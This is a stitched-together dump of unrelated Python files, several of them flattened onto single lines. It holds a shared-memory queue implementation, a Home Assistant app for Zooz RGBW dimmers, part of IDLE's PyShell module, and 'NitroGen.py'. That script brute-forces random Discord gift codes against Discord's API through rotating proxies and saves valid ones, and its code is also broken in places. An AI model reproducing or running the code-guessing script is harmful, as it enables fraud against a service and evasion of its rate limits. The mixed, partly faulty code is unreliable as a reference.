            for i in range(total_chunks):
                try:
                    remaining_timeout: typing.Optional[float] = timeout
                    if remaining_timeout is not None:
                        remaining_timeout -= (time.time() - time_start)
                        if remaining_timeout <= 0:
                            if self.verbose:
                                print("put: qid=%d src_pid=%d msg_id=%r: queue FULL" % (self.qid, src_pid, msg_id),
                                      file=sys.stderr, flush=True)  # ***
                            raise Full
                    block_id = self.next_writable_block_id(block, remaining_timeout, msg_id, src_pid)
                    block_id_list.append(block_id)
                except Full:
                    # We failed to find a free block and/or a timeout occured.
                    # Release the reserved blocks.
                    if self.verbose:
                        print("put: qid=%d src_pid=%d msg_id=%r: releasing %d blocks" % (self.qid, src_pid, msg_id, len(block_id_list)),
                              file=sys.stderr, flush=True)  # ***
                    for block_id in block_id_list:
                        self.add_free_block(block_id)
                    raise
        finally:
            # Now that we have acquired the full set of chunks, we can release
            # the producer lock. We don't want to hold it while we transfer
            # data into the blocks.
            if self.verbose:
                print("put: qid=%d src_pid=%d msg_id=%r: releasing producer lock" % (self.qid, src_pid, msg_id),
                      file=sys.stderr, flush=True)  # ***
            self.producer_lock.release()

        # Consume this message ID.
        self.consume_msg_id()

        if self.verbose:
            print("put: qid=%d src_pid=%d msg_id=%r: acquired %d blocks" % (self.qid, src_pid, msg_id, total_chunks),
                  file=sys.stderr, flush=True)  # ***

        # Now that we have a full set of blocks, build the
        # chunks:
        block_idx: int
        for block_idx, block_id in enumerate(block_id_list):
            chunk_id = block_idx + 1
            if self.verbose:
                print("put: qid=%d src_pid=%d msg_id=%r: chunk_id=%d of total_chunks=%d" % (self.qid, src_pid, msg_id, chunk_id, total_chunks),
                      file=sys.stderr, flush=True)  # ***
            data_block: SharedMemory = self.data_blocks[block_id]
            chunk_data: bytes = msg_body[block_idx * self.chunk_size: (block_idx + 1) * self.chunk_size]
            msg_size: int = len(chunk_data)
            if self.verbose:
                print("put: qid=%d src_pid=%d msg_id=%r: chunk_id=%d: block_id=%d msg_size=%d."
                      % (self.qid, src_pid, msg_id, chunk_id, block_id, msg_size), file=sys.stderr, flush=True)  # ***
            if self.integrity_check:
                checksum: int = zlib.adler32(chunk_data)
                if self.verbose:
                    print("put: qid=%d src_pid=%d msg_id=%r: chunk_id=%d: checksum=%x total_msg_size=%d" % (self.qid, src_pid, msg_id, chunk_id, checksum, total_msg_size),
                          file=sys.stderr, flush=True)  # ***
            with self.block_locks[block_id]:
                self.set_meta(data_block, msg_id, 'msg_id')
                self.set_meta(data_block, msg_size, 'msg_size')
                self.set_meta(data_block, chunk_id, 'chunk_id')
                self.set_meta(data_block, total_chunks, 'total_chunks')
                if self.integrity_check:
                    self.set_meta(data_block, total_msg_size, 'total_msg_size')
                    self.set_meta(data_block, checksum, 'checksum')
                if chunk_id == total_chunks:
                    # No more chunks, store a reserved value to simplify debugging.
                    self.set_meta(data_block, self.__class__.RESERVED_BLOCK_ID, 'next_chunk_block_id')
                else:
                    # Store the block ID of the next chunk.
                    self.set_meta(data_block, block_id_list[block_idx + 1], 'next_chunk_block_id')
                self.set_data(data_block, chunk_data, msg_size)

        # Now that the entire message has built, queue it:
        self.add_msg(block_id_list[0])
        if self.verbose:
            print("put: qid=%d src_pid=%d msg_id=%r: message sent" % (self.qid, src_pid, msg_id),
                  file=sys.stderr, flush=True)  # ***

    def get(self, block: bool=True, timeout: typing.Optional[float]=None)->typing.Any:
        """
        Get the next available message from the queue.

        Args:
            block (bool, optional): If it is set to True (default), it will only return when an item is available.
            timeout (int, optional): A positive integer for the timeout duration in seconds, which is only effective when `block` is set to True.

        Returns:
            object: A message object retrieved from the queue.

        Raises:
            queue.Empty: This exception will be raised if it times out or queue is empty when `block` is False.
            ValueError: An internal error occurred in accessing the message's metadata.
            UnpicklingError: This exception is raised when the serializer is pickle and an error occurred in deserializing the message.

        Note:
            - Errors other than UnpicklingError might be raised if a serializer other than pickle is specified.
        """
        time_start: float = time.time()

        # We will build a list of message chunks. We can't
        # release them until after we deserialize the data.
        block_id: int
        chunk_id: int
        msg_block_ids: typing.List[int] = [ ]
        data_block: SharedMemory
        try:
            remaining_timeout: typing.Optional[float] = timeout
            if remaining_timeout is not None:
                remaining_timeout -= (time.time() - time_start)
                if remaining_timeout <= 0:
                    if self.verbose:
                        # NOTE(review): this message is labeled "put:" and
                        # references src_pid/msg_id before they are assigned
                        # in this method (NameError when verbose) -- confirm
                        # and fix upstream; runtime string kept as-is.
                        print("put: qid=%d src_pid=%d msg_id=%r: queue EMPTY" % (self.qid, src_pid, msg_id),
                              file=sys.stderr, flush=True)  # ***
                    raise Empty
            src_pid: int
            msg_id: bytes
            total_chunks: int
            next_chunk_block_id: int
            src_pid, msg_id, block_id, total_chunks, next_chunk_block_id = self.next_readable_msg(block, remaining_timeout)  # This call might raise Empty.
            if self.verbose:
                print("get: qid=%d src_pid=%d msg_id=%r: total_chunks=%d next_chunk_block_id=%d." % (self.qid, src_pid, msg_id, total_chunks, next_chunk_block_id),
                      file=sys.stderr, flush=True)  # ***
            msg_block_ids.append(block_id)

            # Acquire the chunks for the rest of the message:
            i: int
            for i in range(1, total_chunks):
                chunk_id = i + 1
                if self.verbose:
                    print("get: qid=%d src_pid=%d msg_id=%r: chunk_id=%d: block_id=%d."
                          % (self.qid, src_pid, msg_id, chunk_id, next_chunk_block_id), file=sys.stderr, flush=True)  # ***
                msg_block_ids.append(next_chunk_block_id)
                data_block = self.data_blocks[next_chunk_block_id]
                with self.block_locks[next_chunk_block_id]:
                    maybe_next_chunk_block_id: typing.Union[bytes, int] = self.get_meta(data_block, 'next_chunk_block_id')
                if isinstance(maybe_next_chunk_block_id, int):
                    next_chunk_block_id = maybe_next_chunk_block_id
                else:
                    raise ValueError("get: internal error getting next_chunk_block_id")
        except Exception:
            # Release the data blocks (losing the message) if we get an
            # unexpected exception:
            if self.verbose:
                print("put: qid=%d: releasing data blocks due to Exception" % self.qid,
                      file=sys.stderr, flush=True)  # ***
            for block_id in msg_block_ids:
                self.add_free_block(block_id)
            msg_block_ids.clear()
            raise

        buf_msg_body: typing.List[bytes] = []
        try:
            block_idx: int
            for block_idx, block_id in enumerate(msg_block_ids):
                chunk_id = block_idx + 1
                data_block = self.data_blocks[block_id]
                with self.block_locks[block_id]:
                    maybe_msg_size: typing.Union[bytes, int] = self.get_meta(data_block, 'msg_size')
                    if isinstance(maybe_msg_size, int):
                        msg_size: int = maybe_msg_size
                    else:
                        raise ValueError("get: internal error getting msg_size")
                    if self.integrity_check:
                        if block_idx == 0:
                            # total_msg_size is stored only on the first chunk.
                            maybe_total_msg_size: typing.Union[bytes, int] = self.get_meta(data_block, 'total_msg_size')
                            if isinstance(maybe_total_msg_size, int):
                                total_msg_size: int = maybe_total_msg_size
                            else:
                                raise ValueError("set: internal errpor getting total_msg_size")
                        maybe_checksum: typing.Union[bytes, int] = self.get_meta(data_block, 'checksum')
                        if isinstance(maybe_checksum, int):
                            checksum: int = maybe_checksum
                        else:
                            raise ValueError("get: internal error getting checksum")
                    chunk_data: bytes = self.get_data(data_block, msg_size)  # This may make a reference, not a deep copy.
                if self.verbose:
                    print("get: qid=%d src_pid=%d msg_id=%r: chunk_id=%d: block_id=%d msg_size=%d total_chunks=%d."
                          % (self.qid, src_pid, msg_id, chunk_id, block_id, msg_size, total_chunks), file=sys.stderr, flush=True)  # ***
                if self.integrity_check:
                    checksum2: int = zlib.adler32(chunk_data)
                    if checksum == checksum2:
                        if self.verbose:
                            print("get: qid=%d src_pid=%d msg_id=%r: chunk_id=%d: checksum=%x is OK" % (self.qid, src_pid, msg_id, chunk_id, checksum),
                                  file=sys.stderr, flush=True)  # ***
                    else:
                        raise ValueError("ShmQueue.get: qid=%d src_pid=%d msg_id=%r: chunk_id=%d: block_id=%d checksum=%x != checksum2=%x -- FAIL!" % (self.qid, src_pid, msg_id, chunk_id, block_id, checksum, checksum2))  # TODO: use a better exception
                buf_msg_body.append(chunk_data)  # This may copy the reference.
            msg_body: bytes = b''.join(buf_msg_body)  # Even this might copy the references.
            if self.integrity_check:
                if total_msg_size == len(msg_body):
                    if self.verbose:
                        print("get: qid=%d src_pid=%d msg_id=%r: total_msg_size=%d is OK" % (self.qid, src_pid, msg_id, total_msg_size),
                              file=sys.stderr, flush=True)  # ***
                else:
                    raise ValueError("get: qid=%d src_pid=%d msg_id=%r: total_msg_size=%d != len(msg_body)=%d -- FAIL!" % (self.qid, src_pid, msg_id, total_msg_size, len(msg_body)))  # TODO: use a beter exception.
            try:
                # Finally, we are guaranteed to copy the data.
                msg: typing.Any = self.serializer.loads(msg_body)  # type: ignore[union-attr]

                # We could release the blocks here, but then we'd have to
                # release them in the except clause, too.
                return msg
            except pickle.UnpicklingError as e:
                print("get: Fail: qid=%d src_pid=%d msg_id=%r: msg_size=%d chunk_id=%d total_chunks=%d." % (self.qid, src_pid, msg_id, msg_size, chunk_id, total_chunks),
                      file=sys.stderr, flush=True)  # ***
                if self.integrity_check:
                    print("get: Fail: qid=%d src_pid=%d msg_id=%r: total_msg_size=%d checksum=%x" % (self.qid, src_pid, msg_id, total_msg_size, checksum),
                          file=sys.stderr, flush=True)  # ***
                raise
        finally:
            # It is now safe to release the data blocks. This is a good place
            # to release them, because it covers error paths as well as the main return.
if self.verbose: print("get: qid=%d src_pid=%d msg_id=%r: releasing %d blocks." % (self.qid, src_pid, msg_id, len(msg_block_ids)), file=sys.stderr, flush=True) # *** for block_id in msg_block_ids: self.add_free_block(block_id) msg_block_ids.clear() buf_msg_body.clear() def get_nowait(self)->typing.Any: """ Equivalent to `get(False)`. """ return self.get(False) def put_nowait(self, msg: typing.Any): """ Equivalent to `put(obj, False)`. """ return self.put(msg, False) def qsize(self)->int: """int: Return the number of ready messages.""" return self.get_msg_count() def empty(self)->bool: """bool: True when no messages are ready.""" return self.get_msg_count() == 0 def full(self)->bool: """bool: True when no free blocks are available.""" return self.get_free_block_count() == 0 def close(self): """ Indicate no more new data will be added and release the shared memory areas. """ block: SharedMemory for block in self.data_blocks: block.close() block.unlink() self.list_heads.close() self.list_heads.unlink() def __del__(self): pass
zooz_rgbw_light.py
import appdaemon.plugins.hass.hassapi as hass
import json
from threading import Thread


class ZoozRGBWLight(hass.Hass):
    """AppDaemon app that exposes a Zooz 5-channel Z-Wave dimmer group
    (main + R/G/B/W channels) as a single MQTT-discovered RGBW light in
    Home Assistant.

    Required app args:
        light_name:    friendly name for the published MQTT light
        unique_id:     unique id, also used for the entity id and MQTT topics
        zooz_entities: mapping with "main", "r", "g", "b" and "w" light
                       entity ids of the underlying Z-Wave dimmers
    """

    def initialize(self):
        """Publish the MQTT discovery config and mirror the resulting entity."""
        args = self.args
        self.light_name = args["light_name"]
        self.unique_id = args["unique_id"]
        self.entity_id = "light.{}".format(self.unique_id)

        zooz = args["zooz_entities"]
        self.dimmer_main = zooz["main"]
        self.dimmer_r = zooz["r"]
        self.dimmer_g = zooz["g"]
        self.dimmer_b = zooz["b"]
        self.dimmer_w = zooz["w"]
        # Order matters: it must match [brightness, R, G, B, W] in turn_on().
        self.dimmer_entities = [self.dimmer_main, self.dimmer_r,
                                self.dimmer_g, self.dimmer_b, self.dimmer_w]

        light_attributes = {
            "schema": "json",
            "name": self.light_name,
            "unique_id": self.unique_id,
            "icon": "mdi:led-strip-variant",
            "command_topic": "zooz/{id}/cmd".format(id=self.unique_id),
            "brightness": True,
            "color_mode": True,
            "supported_color_modes": ["rgbw"],
            "effect": True,
            "effect_list": [
                "Disabled",
                "Fireplace",
                "Storm",
                "Rainbow",
                "Polar Lights",
                "Police"
            ]
        }

        # Create/update the light in Home Assistant via MQTT discovery.
        light_config_topic = "homeassistant/light/{id}/config".format(id=self.unique_id)
        self.call_service("mqtt/publish", topic=light_config_topic,
                          payload=json.dumps(light_attributes))

        self.listen_state(self.state_changed, self.entity_id, attribute="all")
        self.log("'{}' initialized.".format(self.entity_id))

    def state_changed(self, entity, attribute, old, new, kwargs):
        """Mirror state changes of the virtual MQTT light onto the dimmers.

        Fix: with attribute="all", AppDaemon passes ``old`` (and in edge
        cases ``new``) as None on the first callback after a restart; the
        original code crashed on ``old['state']`` there.
        """
        self.log("'{}' state changed.".format(self.entity_id))
        if new is None:
            return
        if new["state"] == 'on':
            effect = new['attributes'].get("effect", "Disabled")
            was_on = old is not None and old.get('state') == 'on'
            old_effect = (old.get('attributes') or {}).get("effect", "Disabled") if old else "Disabled"
            if was_on and effect != old_effect:
                # Already on and only the effect changed: just switch programs.
                self.set_effect(effect)
            else:
                self.turn_on(new['attributes'])
        else:
            self.turn_off()

    def set_effect(self, effect):
        """Select a preset program on the main dimmer (Zooz config param 157)."""
        self.log("Setting effect: {}".format(effect))
        # "Disabled" maps to the controller's literal "preset programs disabled"
        # config value; real effects are sent lower-cased.
        value = effect.lower() if effect != "Disabled" else "preset programs disabled"
        self.call_service("zwave_js/set_config_parameter",
                          entity_id=self.dimmer_main, parameter="157", value=value)

    def turn_on(self, attributes):
        """Apply brightness + RGBW color from the MQTT light's attribute dict.

        NOTE: intentionally shadows hass.Hass.turn_on — callers here pass the
        attribute dict of the virtual light, not an entity id.
        """
        state = {
            "brightness": attributes.get("brightness", 255),
            "rgbw": attributes.get("rgbw_color", [0, 0, 0, 255]),
        }
        self.log("Turning on with {}".format(state))
        # Drive all five channels concurrently so the transition looks atomic;
        # levels line up with dimmer_entities = [main, r, g, b, w].
        levels = [state["brightness"]] + list(state["rgbw"])
        for entity, level in zip(self.dimmer_entities, levels):
            self.turn_on_in_thread(entity, level)

    def turn_on_in_thread(self, entity, brightness):
        """Call light/turn_on for one dimmer on a worker thread (non-blocking)."""
        Thread(target=self.call_service, args=["light/turn_on"],
               kwargs={"entity_id": entity, "brightness": brightness}).start()

    def turn_off(self):
        """Turn every underlying dimmer off with a single service call."""
        self.log("Turning off")
        self.call_service("light/turn_off", entity_id=self.dimmer_entities)
NitroGen.py
import requests import string import random from sys import argv, exit from threading import Thread try: caracteres = int(argv[1]) threads = int(argv[2]) proxys = argv[3] except: print('Error, Set Characters, Threads And List Proxys!!!') exit() proxys = open(proxys, r"D:\\GitHub\\NitroGenerator\\discord") proxys = proxys.readlines() def getandchk(caracteres, proxys): while True: for proxy in proxys: try: proxya = proxy.strip() proxy = {'https': proxya} header = {'user-agent': 'Mozilla/5.0'} code = ('').join(random.choices(string.ascii_letters + string.digits, k=caracteres)) url = ('https://discordapp.com/api/v6/entitlements/gift-codes/{0}?with_application=false&with_subscription_plan=true'.format(code)) r = requests.get(url=url, proxies=proxy, headers=header, timeout=24) if 'Unknown' in r.text: print('#Die', code, proxya) else: save = open('goodnitro.txt', 'a') save.write('#Live', code, proxya) save.close() print('#Live', code, proxya) except: print('#Error', code, proxya) for i in range(threads): t = Thread(target=getandchk, args=(caracteres, proxys)) t.start() t.join(0.5)
PyShell.py
#! /usr/bin/env python3 import getopt import os import os.path import re import socket import subprocess import sys import threading import time import tokenize import traceback import types import io import linecache from code import InteractiveInterpreter from platform import python_version, system try: from tkinter import * except ImportError: print("** IDLE can't import Tkinter.\n" "Your Python may not be configured for Tk. **", file=sys.__stderr__) sys.exit(1) import tkinter.messagebox as tkMessageBox from idlelib.EditorWindow import EditorWindow, fixwordbreaks from idlelib.FileList import FileList from idlelib.ColorDelegator import ColorDelegator from idlelib.UndoDelegator import UndoDelegator from idlelib.OutputWindow import OutputWindow from idlelib.configHandler import idleConf from idlelib import idlever from idlelib import rpc from idlelib import Debugger from idlelib import RemoteDebugger from idlelib import macosxSupport HOST = '127.0.0.1' # python execution server on localhost loopback PORT = 0 # someday pass in host, port for remote debug capability # Override warnings module to write to warning_stream. Initialize to send IDLE # internal warnings to the console. ScriptBinding.check_syntax() will # temporarily redirect the stream to the shell window to display warnings when # checking user's code. warning_stream = sys.__stderr__ # None, at least on Windows, if no console. import warnings def idle_formatwarning(message, category, filename, lineno, line=None): """Format warnings the IDLE way.""" s = "\nWarning (from warnings module):\n" s += ' File \"%s\", line %s\n' % (filename, lineno) if line is None: line = linecache.getline(filename, lineno) line = line.strip() if line: s += " %s\n" % line s += "%s: %s\n" % (category.__name__, message) return s def idle_showwarning( message, category, filename, lineno, file=None, line=None): """Show Idle-format warning (after replacing warnings.showwarning). 
The differences are the formatter called, the file=None replacement, which can be None, the capture of the consequence AttributeError, and the output of a hard-coded prompt. """ if file is None: file = warning_stream try: file.write(idle_formatwarning( message, category, filename, lineno, line=line)) file.write(">>> ") except (AttributeError, OSError): pass # if file (probably __stderr__) is invalid, skip warning. _warnings_showwarning = None def capture_warnings(capture): "Replace warning.showwarning with idle_showwarning, or reverse." global _warnings_showwarning if capture: if _warnings_showwarning is None: _warnings_showwarning = warnings.showwarning warnings.showwarning = idle_showwarning else: if _warnings_showwarning is not None: warnings.showwarning = _warnings_showwarning _warnings_showwarning = None capture_warnings(True) def extended_linecache_checkcache(filename=None, orig_checkcache=linecache.checkcache): """Extend linecache.checkcache to preserve the <pyshell#...> entries Rather than repeating the linecache code, patch it to save the <pyshell#...> entries, call the original linecache.checkcache() (skipping them), and then restore the saved entries. orig_checkcache is bound at definition time to the original method, allowing it to be patched. 
""" cache = linecache.cache save = {} for key in list(cache): if key[:1] + key[-1:] == '<>': save[key] = cache.pop(key) orig_checkcache(filename) cache.update(save) # Patch linecache.checkcache(): linecache.checkcache = extended_linecache_checkcache class PyShellEditorWindow(EditorWindow): "Regular text edit window in IDLE, supports breakpoints" def __init__(self, *args): self.breakpoints = [] EditorWindow.__init__(self, *args) self.text.bind("<<set-breakpoint-here>>", self.set_breakpoint_here) self.text.bind("<<clear-breakpoint-here>>", self.clear_breakpoint_here) self.text.bind("<<open-python-shell>>", self.flist.open_shell) self.breakpointPath = os.path.join(idleConf.GetUserCfgDir(), 'breakpoints.lst') # whenever a file is changed, restore breakpoints def filename_changed_hook(old_hook=self.io.filename_change_hook, self=self): self.restore_file_breaks() old_hook() self.io.set_filename_change_hook(filename_changed_hook) if self.io.filename: self.restore_file_breaks() self.color_breakpoint_text() rmenu_specs = [ ("Cut", "<<cut>>", "rmenu_check_cut"), ("Copy", "<<copy>>", "rmenu_check_copy"), ("Paste", "<<paste>>", "rmenu_check_paste"), (None, None, None), ("Set Breakpoint", "<<set-breakpoint-here>>", None), ("Clear Breakpoint", "<<clear-breakpoint-here>>", None) ] def color_breakpoint_text(self, color=True): "Turn colorizing of breakpoint text on or off" if color: theme = idleConf.GetOption('main','Theme','name') cfg = idleConf.GetHighlight(theme, "break") else: cfg = {'foreground': '', 'background': ''} self.text.tag_config('BREAK', cfg) def set_breakpoint(self, lineno): text = self.text filename = self.io.filename text.tag_add("BREAK", "%d.0" % lineno, "%d.0" % (lineno+1)) try: i = self.breakpoints.index(lineno) except ValueError: # only add if missing, i.e. 
do once self.breakpoints.append(lineno) try: # update the subprocess debugger debug = self.flist.pyshell.interp.debugger debug.set_breakpoint_here(filename, lineno) except: # but debugger may not be active right now.... pass def set_breakpoint_here(self, event=None): text = self.text filename = self.io.filename if not filename: text.bell() return lineno = int(float(text.index("insert"))) self.set_breakpoint(lineno) def clear_breakpoint_here(self, event=None): text = self.text filename = self.io.filename if not filename: text.bell() return lineno = int(float(text.index("insert"))) try: self.breakpoints.remove(lineno) except: pass text.tag_remove("BREAK", "insert linestart",\ "insert lineend +1char") try: debug = self.flist.pyshell.interp.debugger debug.clear_breakpoint_here(filename, lineno) except: pass def clear_file_breaks(self): if self.breakpoints: text = self.text filename = self.io.filename if not filename: text.bell() return self.breakpoints = [] text.tag_remove("BREAK", "1.0", END) try: debug = self.flist.pyshell.interp.debugger debug.clear_file_breaks(filename) except: pass def store_file_breaks(self): "Save breakpoints when file is saved" # XXX 13 Dec 2002 KBK Currently the file must be saved before it can # be run. The breaks are saved at that time. If we introduce # a temporary file save feature the save breaks functionality # needs to be re-verified, since the breaks at the time the # temp file is created may differ from the breaks at the last # permanent save of the file. Currently, a break introduced # after a save will be effective, but not persistent. # This is necessary to keep the saved breaks synched with the # saved file. # # Breakpoints are set as tagged ranges in the text. Certain # kinds of edits cause these ranges to be deleted: Inserting # or deleting a line just before a breakpoint, and certain # deletions prior to a breakpoint. These issues need to be # investigated and understood. 
It's not clear if they are # Tk issues or IDLE issues, or whether they can actually # be fixed. Since a modified file has to be saved before it is # run, and since self.breakpoints (from which the subprocess # debugger is loaded) is updated during the save, the visible # breaks stay synched with the subprocess even if one of these # unexpected breakpoint deletions occurs. breaks = self.breakpoints filename = self.io.filename try: with open(self.breakpointPath, "r") as fp: lines = fp.readlines() except OSError: lines = [] try: with open(self.breakpointPath, "w") as new_file: for line in lines: if not line.startswith(filename + '='): new_file.write(line) self.update_breakpoints() breaks = self.breakpoints if breaks: new_file.write(filename + '=' + str(breaks) + '\n') except OSError as err: if not getattr(self.root, "breakpoint_error_displayed", False): self.root.breakpoint_error_displayed = True tkMessageBox.showerror(title='IDLE Error', message='Unable to update breakpoint list:\n%s' % str(err), parent=self.text) def restore_file_breaks(self): self.text.update() # this enables setting "BREAK" tags to be visible if self.io is None: # can happen if IDLE closes due to the .update() call return filename = self.io.filename if filename is None: return if os.path.isfile(self.breakpointPath): with open(self.breakpointPath, "r") as fp: lines = fp.readlines() for line in lines: if line.startswith(filename + '='): breakpoint_linenumbers = eval(line[len(filename)+1:]) for breakpoint_linenumber in breakpoint_linenumbers: self.set_breakpoint(breakpoint_linenumber) def update_breakpoints(self): "Retrieves all the breakpoints in the current window" text = self.text ranges = text.tag_ranges("BREAK") linenumber_list = self.ranges_to_linenumbers(ranges) self.breakpoints = linenumber_list def ranges_to_linenumbers(self, ranges): lines = [] for index in range(0, len(ranges), 2): lineno = int(float(ranges[index].string)) end = int(float(ranges[index+1].string)) while lineno < end: 
lines.append(lineno) lineno += 1 return lines # XXX 13 Dec 2002 KBK Not used currently # def saved_change_hook(self): # "Extend base method - clear breaks if module is modified" # if not self.get_saved(): # self.clear_file_breaks() # EditorWindow.saved_change_hook(self) def _close(self): "Extend base method - clear breaks when module is closed" self.clear_file_breaks() EditorWindow._close(self) class PyShellFileList(FileList): "Extend base class: IDLE supports a shell and breakpoints" # override FileList's class variable, instances return PyShellEditorWindow # instead of EditorWindow when new edit windows are created. EditorWindow = PyShellEditorWindow pyshell = None def open_shell(self, event=None): if self.pyshell: self.pyshell.top.wakeup() else: self.pyshell = PyShell(self) if self.pyshell: if not self.pyshell.begin(): return None return self.pyshell class ModifiedColorDelegator(ColorDelegator): "Extend base class: colorizer for the shell window itself" def __init__(self): ColorDelegator.__init__(self) self.LoadTagDefs() def recolorize_main(self): self.tag_remove("TODO", "1.0", "iomark") self.tag_add("SYNC", "1.0", "iomark") ColorDelegator.recolorize_main(self) def LoadTagDefs(self): ColorDelegator.LoadTagDefs(self) theme = idleConf.GetOption('main','Theme','name') self.tagdefs.update({ "stdin": {'background':None,'foreground':None}, "stdout": idleConf.GetHighlight(theme, "stdout"), "stderr": idleConf.GetHighlight(theme, "stderr"), "console": idleConf.GetHighlight(theme, "console"), }) def removecolors(self): # Don't remove shell color tags before "iomark" for tag in self.tagdefs: self.tag_remove(tag, "iomark", "end") class ModifiedUndoDelegator(UndoDelegator): "Extend base class: forbid insert/delete before the I/O mark" def insert(self, index, chars, tags=None): try: if self.delegate.compare(index, "<", "iomark"): self.delegate.bell() return except TclError: pass UndoDelegator.insert(self, index, chars, tags) def delete(self, index1, index2=None): try: if 
self.delegate.compare(index1, "<", "iomark"): self.delegate.bell() return except TclError: pass UndoDelegator.delete(self, index1, index2) class MyRPCClient(rpc.RPCClient): def handle_EOF(self): "Override the base class - just re-raise EOFError" raise EOFError class ModifiedInterpreter(InteractiveInterpreter): def __init__(self, tkconsole): self.tkconsole = tkconsole locals = sys.modules['__main__'].__dict__ InteractiveInterpreter.__init__(self, locals=locals) self.save_warnings_filters = None self.restarting = False self.subprocess_arglist = None self.port = PORT self.original_compiler_flags = self.compile.compiler.flags _afterid = None rpcclt = None rpcsubproc = None def spawn_subprocess(self): if self.subprocess_arglist is None: self.subprocess_arglist = self.build_subprocess_arglist() self.rpcsubproc = subprocess.Popen(self.subprocess_arglist) def build_subprocess_arglist(self): assert (self.port!=0), ( "Socket should have been assigned a port number.") w = ['-W' + s for s in sys.warnoptions] # Maybe IDLE is installed and is being accessed via sys.path, # or maybe it's not installed and the idle.py script is being # run from the IDLE source directory. del_exitf = idleConf.GetOption('main', 'General', 'delete-exitfunc', default=False, type='bool') if __name__ == 'idlelib.PyShell': command = "__import__('idlelib.run').run.main(%r)" % (del_exitf,) else: command = "__import__('run').main(%r)" % (del_exitf,) return [sys.executable] + w + ["-c", command, str(self.port)] def start_subprocess(self): addr = (HOST, self.port) # GUI makes several attempts to acquire socket, listens for connection for i in range(3): time.sleep(i) try: self.rpcclt = MyRPCClient(addr) break except OSError as err: pass else: self.display_port_binding_error() return None # if PORT was 0, system will assign an 'ephemeral' port. 
Find it out: self.port = self.rpcclt.listening_sock.getsockname()[1] # if PORT was not 0, probably working with a remote execution server if PORT != 0: # To allow reconnection within the 2MSL wait (cf. Stevens TCP # V1, 18.6), set SO_REUSEADDR. Note that this can be problematic # on Windows since the implementation allows two active sockets on # the same address! self.rpcclt.listening_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) self.spawn_subprocess() #time.sleep(20) # test to simulate GUI not accepting connection # Accept the connection from the Python execution server self.rpcclt.listening_sock.settimeout(10) try: self.rpcclt.accept() except socket.timeout as err: self.display_no_subprocess_error() return None self.rpcclt.register("console", self.tkconsole) self.rpcclt.register("stdin", self.tkconsole.stdin) self.rpcclt.register("stdout", self.tkconsole.stdout) self.rpcclt.register("stderr", self.tkconsole.stderr) self.rpcclt.register("flist", self.tkconsole.flist) self.rpcclt.register("linecache", linecache) self.rpcclt.register("interp", self) self.transfer_path(with_cwd=True) self.poll_subprocess() return self.rpcclt def restart_subprocess(self, with_cwd=False): if self.restarting: return self.rpcclt self.restarting = True # close only the subprocess debugger debug = self.getdebugger() if debug: try: # Only close subprocess debugger, don't unregister gui_adap! RemoteDebugger.close_subprocess_debugger(self.rpcclt) except: pass # Kill subprocess, spawn a new one, accept connection. 
self.rpcclt.close() self.terminate_subprocess() console = self.tkconsole was_executing = console.executing console.executing = False self.spawn_subprocess() try: self.rpcclt.accept() except socket.timeout as err: self.display_no_subprocess_error() return None self.transfer_path(with_cwd=with_cwd) console.stop_readline() # annotate restart in shell window and mark it console.text.delete("iomark", "end-1c") if was_executing: console.write('\n') console.showprompt() halfbar = ((int(console.width) - 16) // 2) * '=' console.write(halfbar + ' RESTART ' + halfbar) console.text.mark_set("restart", "end-1c") console.text.mark_gravity("restart", "left") console.showprompt() # restart subprocess debugger if debug: # Restarted debugger connects to current instance of debug GUI gui = RemoteDebugger.restart_subprocess_debugger(self.rpcclt) # reload remote debugger breakpoints for all PyShellEditWindows debug.load_breakpoints() self.compile.compiler.flags = self.original_compiler_flags self.restarting = False return self.rpcclt def __request_interrupt(self): self.rpcclt.remotecall("exec", "interrupt_the_server", (), {}) def interrupt_subprocess(self): threading.Thread(target=self.__request_interrupt).start() def kill_subprocess(self): if self._afterid is not None: self.tkconsole.text.after_cancel(self._afterid) try: self.rpcclt.listening_sock.close() except AttributeError: # no socket pass try: self.rpcclt.close() except AttributeError: # no socket pass self.terminate_subprocess() self.tkconsole.executing = False self.rpcclt = None def terminate_subprocess(self): "Make sure subprocess is terminated" try: self.rpcsubproc.kill() except OSError: # process already terminated return else: try: self.rpcsubproc.wait() except OSError: return def transfer_path(self, with_cwd=False): if with_cwd: # Issue 13506 path = [''] # include Current Working Directory path.extend(sys.path) else: path = sys.path self.runcommand("""if 1: import sys as _sys _sys.path = %r del _sys \n""" % (path,)) 
active_seq = None def poll_subprocess(self): clt = self.rpcclt if clt is None: return try: response = clt.pollresponse(self.active_seq, wait=0.05) except (EOFError, OSError, KeyboardInterrupt): # lost connection or subprocess terminated itself, restart # [the KBI is from rpc.SocketIO.handle_EOF()] if self.tkconsole.closing: return response = None self.restart_subprocess() if response: self.tkconsole.resetoutput() self.active_seq = None how, what = response console = self.tkconsole.console if how == "OK": if what is not None: print(repr(what), file=console) elif how == "EXCEPTION": if self.tkconsole.getvar("<<toggle-jit-stack-viewer>>"): self.remote_stack_viewer() elif how == "ERROR": errmsg = "PyShell.ModifiedInterpreter: Subprocess ERROR:\n" print(errmsg, what, file=sys.__stderr__) print(errmsg, what, file=console) # we received a response to the currently active seq number: try: self.tkconsole.endexecuting() except AttributeError: # shell may have closed pass # Reschedule myself if not self.tkconsole.closing: self._afterid = self.tkconsole.text.after( self.tkconsole.pollinterval, self.poll_subprocess) debugger = None def setdebugger(self, debugger): self.debugger = debugger def getdebugger(self): return self.debugger def open_remote_stack_viewer(self): """Initiate the remote stack viewer from a separate thread. This method is called from the subprocess, and by returning from this method we allow the subprocess to unblock. After a bit the shell requests the subprocess to open the remote stack viewer which returns a static object looking at the last exception. It is queried through the RPC mechanism. 
